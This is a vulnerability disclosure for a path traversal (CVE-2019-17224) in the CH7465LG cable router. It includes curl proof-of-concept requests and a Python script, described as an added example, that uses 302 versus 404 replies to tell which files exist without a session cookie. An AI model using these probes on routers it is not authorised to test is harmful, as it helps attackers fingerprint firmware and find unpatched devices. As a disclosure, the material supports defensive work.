Again a vulnerability in cable router CH7465LG (CVE-2019-17224)

The cable modem/router CH7465LG is provided by various ISPs in Europe, such as UPC in Switzerland, Magenta in Austria, Unitymedia in Germany and Ziggo in the Netherlands.

The web interface offers ping and traceroute functions. A Security Evaluation Report published in 2016 by SEARCH-LAB pointed out two vulnerabilities in these functions in firmware version CH7465LG-NCIP-4.50.18.13-NOSH: the parameters entered by the user were not sanitized, and the API functions that pass these parameters to the ping and traceroute shell binaries required no authentication. As recently described on xitan.me, the only improvement in firmware version CH7465LG-NCIP-6.12.18.24-5p8-NOSH was input validation in the web interface; a remote attacker who sends the crafted parameters directly to the API could still execute commands on the shell (CVE-2019-13025). The blog post announced that more vulnerabilities existed in the web interface, so I decided to look for them.

Analyzing the latest firmware version CH7465LG-NCIP-6.12.18.25-2p6-NOSH, I discovered a path traversal vulnerability that can be exploited remotely, without sending a session cookie, to determine whether a given file exists outside the web root directory.

Proof of Concept

According to the SEARCH-LAB report, the ping results are written to /var/tmp/ping_result. Before any ping has been run, an HTTP request for that path, with the leading slash URL-encoded as %2f so that the absolute path passes the web root check, is redirected to the login page:

$ curl -I http://192.168.0.1/%2f/var/tmp/ping_result
HTTP/1.1 302 Moved Temporarily
Location: ../index.html
Server: NET-DK/1.0
Date: Thu, 26 Sep 2019 22:24:07 GMT
Connection: close
Set-Cookie: sessionToken=1245054720; path=/;

After launching a ping from the web interface, which creates and writes the file, the same request returns a different status code:

$ curl -I http://192.168.0.1/%2f/var/tmp/ping_result
HTTP/1.1 404 Not Found
Server: NET-DK/1.0
Date: Thu, 26 Sep 2019 21:49:35 GMT
Content-Type: text/html

The 404 here most likely means the file was found but is not served because it has no registered MIME type. The difference between the two responses, 302 for a missing file and 404 for an existing one, is what turns the traversal into a file-existence oracle; neither request carried a session cookie.
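To turn the two curl requests into a repeatable check, here is an added example (my own script, not code from the original post or from the vendor) that builds the %2f traversal URL for a list of absolute paths and maps each reply to a verdict using the 302/404 difference shown above. It assumes the router is reachable at http://192.168.0.1 and that the server keeps behaving as captured; the replay data and the control path /var/tmp/does_not_exist are constructed so the script runs offline.

```python
import urllib.error
import urllib.request
from urllib.parse import quote

ROUTER = "http://192.168.0.1"  # LAN address used in the post (assumption)


def probe_url(path, base=ROUTER):
    """Build the traversal URL: an encoded slash (%2f) in front of the
    absolute path, exactly as in the curl requests above."""
    if not path.startswith("/"):
        raise ValueError("expected an absolute path, got %r" % path)
    return f"{base}/%2f{quote(path)}"


def classify(status, location=None):
    """Turn a response into an existence verdict (the oracle).

    302 to the login page: the server could not open the file -> absent.
    404: the file exists but has no registered MIME type -> present
         (the behaviour observed for /var/tmp/ping_result above).
    200: the file was served outright -> present.
    Anything else is reported as unknown rather than guessed.
    """
    if status == 302 and (location or "").endswith("index.html"):
        return "absent"
    if status in (404, 200):
        return "present"
    return "unknown"


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Keep the 302 instead of following it, so the status code stays visible."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def fetch_status(url, timeout=5):
    """HEAD the URL (like curl -I) and return (status, Location header)."""
    req = urllib.request.Request(url, method="HEAD")
    opener = urllib.request.build_opener(_NoRedirect())
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # urllib raises for 3xx/4xx replies
        return err.code, err.headers.get("Location")


def check_paths(paths, fetch=fetch_status):
    """Run the oracle over a list of absolute paths.

    `fetch` is injectable so the logic can be exercised without a router."""
    verdicts = {}
    for path in paths:
        status, location = fetch(probe_url(path))
        verdicts[path] = classify(status, location)
    return verdicts


# Constructed replay of the responses captured in the post: the ping result
# file answers 404, every other path answers the 302 to the login page.
# "/var/tmp/does_not_exist" is a made-up control path.
CAPTURED = {
    probe_url("/var/tmp/ping_result"): (404, None),
}


def replay_fetch(url):
    """Offline stand-in for fetch_status using the constructed replay data."""
    return CAPTURED.get(url, (302, "../index.html"))


if __name__ == "__main__":
    targets = ["/var/tmp/ping_result", "/var/tmp/does_not_exist"]
    # Swap replay_fetch for fetch_status to run against a real device.
    for path, verdict in check_paths(targets, fetch=replay_fetch).items():
        print(f"{path}: {verdict}")
```

Against a live device, replace `replay_fetch` with `fetch_status`; the request is a HEAD without cookies, matching the curl -I calls in the proof of concept.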

Severity:

Knowing whether a given file exists on the device can be used to fingerprint the installed firmware version and to check whether the patch for a known vulnerability has been installed.
